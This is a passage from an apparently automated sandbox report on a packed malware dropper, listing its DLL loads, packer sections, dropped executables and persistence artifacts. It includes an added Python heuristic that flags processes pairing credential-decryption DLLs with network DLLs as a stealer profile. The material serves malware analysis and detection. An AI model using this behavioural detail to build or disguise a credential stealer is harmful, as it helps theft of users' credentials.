Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: riched20.dll
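The "Section loaded" events above are most useful when read per process rather than line by line: a dropped payload that pulls in vaultcli.dll and dpapi.dll (Windows Vault and DPAPI credential decryption) together with winhttp.dll/schannel.dll/dnsapi.dll (TLS egress) fits the stealer profile the report's detections name, whereas a process that only loads apphelp.dll and msimg32.dll tells you little. The script below is an added example written for this page, not part of the sandbox's own tooling. It parses lines in the report's format into a per-process DLL set and flags processes whose loads cover both a credential-access bucket and a network bucket. The capability buckets are the author's heuristic grouping, and the sample input is a constructed subset of the report's own lines.

```python
import re
from collections import defaultdict

# Constructed sample in the report's own line format (a subset of the lines above);
# the last line is a different event type that the parser must ignore.
SAMPLE_LINES = r"""
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: winhttp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: schannel.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: vaultcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File written: C:\Windows\System32\GroupPolicy\gpt.ini
"""

LOAD_RE = re.compile(r"^Source: (?P<proc>.+?) Section loaded: (?P<dll>\S+)$")

# Capability buckets: heuristic grouping chosen for this example, not part of the report.
CAPABILITIES = {
    "credential_access": {"vaultcli.dll", "dpapi.dll"},
    "network_tls": {"winhttp.dll", "wininet.dll", "schannel.dll", "dnsapi.dll"},
    "wmi_fingerprint": {"wbemcomn.dll"},
    "managed_code_amsi": {"amsi.dll"},
}


def parse_loads(text):
    """Map each process path to the set of DLLs the report says it loaded."""
    loads = defaultdict(set)
    for line in text.splitlines():
        m = LOAD_RE.match(line.strip())
        if m:
            loads[m["proc"]].add(m["dll"].lower())
    return dict(loads)


def capabilities(dlls):
    """Names of every bucket that at least one loaded DLL falls into."""
    return {name for name, members in CAPABILITIES.items() if dlls & members}


def stealer_profile(loads, required=("credential_access", "network_tls")):
    """Processes whose DLL set covers every required bucket, with their full bucket list."""
    hits = {}
    for proc, dlls in loads.items():
        caps = capabilities(dlls)
        if all(r in caps for r in required):
            hits[proc] = sorted(caps)
    return hits


if __name__ == "__main__":
    for proc, caps in stealer_profile(parse_loads(SAMPLE_LINES)).items():
        print(f"{proc}: {', '.join(caps)}")
```

On the sample input this flags the dropped rYuCm9r3mZzk_0VrthAnPu8c.exe and the RegAsm.exe host (which also carries the WMI and AMSI buckets, consistent with injected managed code), and leaves cX55WveNgznoE8Y_EKeykvl8.exe alone. The same parser runs unchanged over the full list above; widen `required` or add buckets (for example rstrtmgr.dll, which stealers use to release locked browser database files) to tune it.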
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EA502722-A23D-11D1-A7D3-0000F87571E3}\InProcServer32
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File written: C:\Windows\System32\GroupPolicy\gpt.ini
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: WlCIinu0yp.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: WlCIinu0yp.exe Static file information: File size 5740032 > 1048576
Source: WlCIinu0yp.exe Static PE information: Raw size of .themida is bigger than: 0x100000 < 0x4b0000
Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: WlCIinu0yp.exe
Source: Binary string: C:\Users\weckb\source\repos\Hider\Hider\obj\x64\Release\Hider.pdb source: ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000000.1909451075.000001C579D82000.00000002.00000001.01000000.00000007.sdmp, ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2953053052.000001C57C160000.00000002.00000001.00040000.00000007.sdmp
Source: Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb++ source: is-280SC.tmp.25.dr
Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2746107478.0000000068E44000.00000002.00000001.01000000.00000021.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2703885312.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004501000.00000004.00000800.00020000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2547368675.00000000005A4000.00000040.00000001.01000000.00000006.sdmp, H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3127380532.00000000005EB000.00000040.00000001.01000000.00000011.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2538173466.000000000059E000.00000040.00000001.01000000.00000014.sdmp
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: WlCIinu0yp.exe
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Xml.pdb source: is-OFQC1.tmp.25.dr
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: WlCIinu0yp.exe
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\kkelsch\Documents\PushNotifications\PushSharp\PushSharp-master\PushSharp.Core\obj\Debug\PushSharp.Core.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2703885312.0000000005DCA000.00000004.08000000.00040000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004C88000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\Program Files\Microsoft Enterprise Library January 2006\src\Data\obj\Debug\Microsoft.Practices.EnterpriseLibrary.Data.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000C62000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb source: is-280SC.tmp.25.dr

Data Obfuscation

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Unpacked PE file: 7.2.hvkESMr10WtP7_E6btIJmDx0.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Unpacked PE file: 12.2.ZzpT5hwyVjlAXfLjB1r1iwOX.exe.900000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe Unpacked PE file: 16.2.H14SDf_AWcPvvQK5Xx97sISX.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Unpacked PE file: 22.2.rYuCm9r3mZzk_0VrthAnPu8c.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe Unpacked PE file: 46.2.softjenimmp3converter.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.libcc1:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe Unpacked PE file: 46.2.softjenimmp3converter.exe.400000.0.unpack
Source: ydYqwUL3GNS6IHkMgIteny78.exe.0.dr Static PE information: 0xC2FA201D [Mon Aug 28 18:55:25 2073 UTC]
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00418BB0 LoadLibraryA,GetProcAddress, 7_2_00418BB0
Source: initial sample Static PE information: section where entry point is pointing to: .themida
Source: 9RJ0JeM9uj2rfsuq_woBmmIY.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x5b5a0
Source: q9Sc3pS9TsI8vZtTlbAuGG_b.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x74bbb1
Source: 0kNDw1qtthM70owdcV01L1ro.exe.0.dr Static PE information: real checksum: 0x41d363 should be: 0x41c252
Source: FCK5Px_iTbBaGQTFBpzZeks2.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x4f5bd9
Source: 7725eaa6592c80f8124e769b4e8a07f7[1].exe.0.dr Static PE information: real checksum: 0x41d363 should be: 0x41c252
Source: MSIUpdaterV202.exe.7.dr Static PE information: real checksum: 0x0 should be: 0x7cd8c
Source: lumma2804[1].exe.7.dr Static PE information: real checksum: 0x0 should be: 0x7cd8c
Source: setup[1].exe.0.dr Static PE information: real checksum: 0x0 should be: 0x74bbb1
Source: ydYqwUL3GNS6IHkMgIteny78.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x1458c
Source: 6JeTTVCBi2pYO9g7t24p.exe.7.dr Static PE information: real checksum: 0x0 should be: 0x7cd8c
Source: AdobeUpdaterV202.exe.7.dr Static PE information: real checksum: 0x0 should be: 0x7cd8c
Source: aeb24096[1].exe.0.dr Static PE information: real checksum: 0x0 should be: 0xb3e71
Source: lmmycYk2THJ6kqlicmdyWtVT.exe.0.dr Static PE information: real checksum: 0x0 should be: 0xb3e71
Source: 060[1].exe.0.dr Static PE information: real checksum: 0x0 should be: 0x4f5bd9
Source: cad54ba5b01423b1af8ec10ab5719d97[1].exe.0.dr Static PE information: real checksum: 0x41d363 should be: 0x422cc4
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x311de9
Source: wDFs1SzoVQiT2__nQmbIm6Rg.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x821d7
Source: fiona[1].exe.0.dr Static PE information: real checksum: 0x0 should be: 0x311de9
Source: njeL_S54LMD1B6b6sdXBUgG6.exe.0.dr Static PE information: real checksum: 0x41d363 should be: 0x422cc4
Source: WlCIinu0yp.exe Static PE information: section name:
Source: WlCIinu0yp.exe Static PE information: section name:
Source: WlCIinu0yp.exe Static PE information: section name: .themida
Source: Retailer_prog[1].exe.0.dr Static PE information: section name: .MPRESS1
Source: Retailer_prog[1].exe.0.dr Static PE information: section name: .MPRESS2
Source: H14SDf_AWcPvvQK5Xx97sISX.exe.0.dr Static PE information: section name: .MPRESS1
Source: H14SDf_AWcPvvQK5Xx97sISX.exe.0.dr Static PE information: section name: .MPRESS2
Source: Default12_big[1].exe.0.dr Static PE information: section name: .MPRESS1
Source: Default12_big[1].exe.0.dr Static PE information: section name: .MPRESS2
Source: hvkESMr10WtP7_E6btIJmDx0.exe.0.dr Static PE information: section name: .MPRESS1
Source: hvkESMr10WtP7_E6btIJmDx0.exe.0.dr Static PE information: section name: .MPRESS2
Source: fiona[1].exe.0.dr Static PE information: section name:
Source: fiona[1].exe.0.dr Static PE information: section name:
Source: fiona[1].exe.0.dr Static PE information: section name:
Source: fiona[1].exe.0.dr Static PE information: section name:
Source: fiona[1].exe.0.dr Static PE information: section name:
Source: fiona[1].exe.0.dr Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: section name:
Source: 123p[1].exe.0.dr Static PE information: section name: .00cfg
Source: 123p[1].exe.0.dr Static PE information: section name: .text0
Source: 123p[1].exe.0.dr Static PE information: section name: .text1
Source: 123p[1].exe.0.dr Static PE information: section name: .text2
Source: 0aUjr05rR32eKJo8dvN8X8hr.exe.0.dr Static PE information: section name: .00cfg
Source: 0aUjr05rR32eKJo8dvN8X8hr.exe.0.dr Static PE information: section name: .text0
Source: 0aUjr05rR32eKJo8dvN8X8hr.exe.0.dr Static PE information: section name: .text1
Source: 0aUjr05rR32eKJo8dvN8X8hr.exe.0.dr Static PE information: section name: .text2
Source: wDFs1SzoVQiT2__nQmbIm6Rg.exe.0.dr Static PE information: section name: .Right
Source: 9RJ0JeM9uj2rfsuq_woBmmIY.exe.0.dr Static PE information: section name: .Shine
Source: ifM1E2HUtOYe96efnF4a_sDH.exe.0.dr Static PE information: section name: .vmp1024
Source: ifM1E2HUtOYe96efnF4a_sDH.exe.0.dr Static PE information: section name: .vmp1024
Source: setup[1].exe.0.dr Static PE information: section name: .sxdata
Source: q9Sc3pS9TsI8vZtTlbAuGG_b.exe.0.dr Static PE information: section name: .sxdata
Source: Space1.9_big[1].exe.0.dr Static PE information: section name: .MPRESS1
Source: Space1.9_big[1].exe.0.dr Static PE information: section name: .MPRESS2
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe.0.dr Static PE information: section name: .MPRESS1
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe.0.dr Static PE information: section name: .MPRESS2
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_006BE177 push ebp; mov dword ptr [esp], 00000004h 7_2_0096D884
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0070415A push esi; mov dword ptr [esp], ecx 7_2_00971463
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_006C9129 push ecx; mov dword ptr [esp], 659B8DACh 7_2_00995BA3
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_005FE137 push 65E6F80Ah; mov dword ptr [esp], eax 7_2_009A824D
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_005FE137 push 6AD2D916h; mov dword ptr [esp], ecx 7_2_009B59B7
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_005F51F9 push 028D9D34h; mov dword ptr [esp], edx 7_2_009B6F69
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_004DD189 push ecx; ret 7_2_004DD19C
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_007111A6 push 2B03A790h; mov dword ptr [esp], edi 7_2_00988941
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_005CF185 push esi; mov dword ptr [esp], 0F6E47D3h 7_2_009BA4F6
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_005B4223 push 1B0273DFh; mov dword ptr [esp], esi 7_2_0099CE7E
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_006B234A push ecx; mov dword ptr [esp], edx 7_2_009B19CE
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_006B234A push eax; mov dword ptr [esp], edx 7_2_009B19E8
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_005F939D push 62D5C5BCh; mov dword ptr [esp], edi 7_2_009B0759
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_006C339B push 04BD78A0h; mov dword ptr [esp], ebx 7_2_009989EE
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_005FA449 push 12672850h; mov dword ptr [esp], edi 7_2_009AEB84
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00718415 push ebx; mov dword ptr [esp], edi 7_2_009A5ED6
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_006BF4C8 push esi; mov dword ptr [esp], 6B355F99h 7_2_0098D96D
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_005B5579 push edx; mov dword ptr [esp], ecx 7_2_009B1043
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_006BB50B push ebx; mov dword ptr [esp], ecx 7_2_009BCA3D
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_005E0523 push 31E0CF80h; mov dword ptr [esp], esp 7_2_00990856
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_005E0523 push 74CF83F9h; mov dword ptr [esp], ecx 7_2_009B7503
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_005CB652 push 41EB57B3h; mov dword ptr [esp], ecx 7_2_009B50E6
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_005E36DA push ebp; mov dword ptr [esp], eax 7_2_009B9534
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_006BB6CB push eax; mov dword ptr [esp], ecx 7_2_009B0F29
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_006BB6CB push 25FCB98Bh; mov dword ptr [esp], ebp 7_2_009B42F1
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0060269F push ebp; mov dword ptr [esp], eax 7_2_009B63D3
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0060269F push ebx; mov dword ptr [esp], edi 7_2_009B63DE
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0060269F push 2D75C53Eh; mov dword ptr [esp], edi 7_2_009BC38F
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_006BB775 push 4E0FB89Eh; mov dword ptr [esp], ebp 7_2_009B9490
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_005C77DE push esi; mov dword ptr [esp], edi 7_2_009ACCF0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_007C97DE push ebx; mov dword ptr [esp], ecx 7_2_009829F9
Source: WlCIinu0yp.exe Static PE information: section name: entropy: 7.282847728316021
Source: fiona[1].exe.0.dr Static PE information: section name: entropy: 7.99971394901448
Source: fiona[1].exe.0.dr Static PE information: section name: entropy: 7.991451211560384
Source: fiona[1].exe.0.dr Static PE information: section name: entropy: 7.81952942947184
Source: fiona[1].exe.0.dr Static PE information: section name: entropy: 7.993366885563393
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: section name: entropy: 7.99971394901448
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: section name: entropy: 7.991451211560384
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: section name: entropy: 7.81952942947184
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: section name: entropy: 7.993366885563393

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Default12_big[1].exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\aeb24096[1].exe
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe File created: C:\Users\user\AppData\Local\Temp\PowerExpertNT\PowerExpertNT.exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-280SC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\unins000.exe (copy)
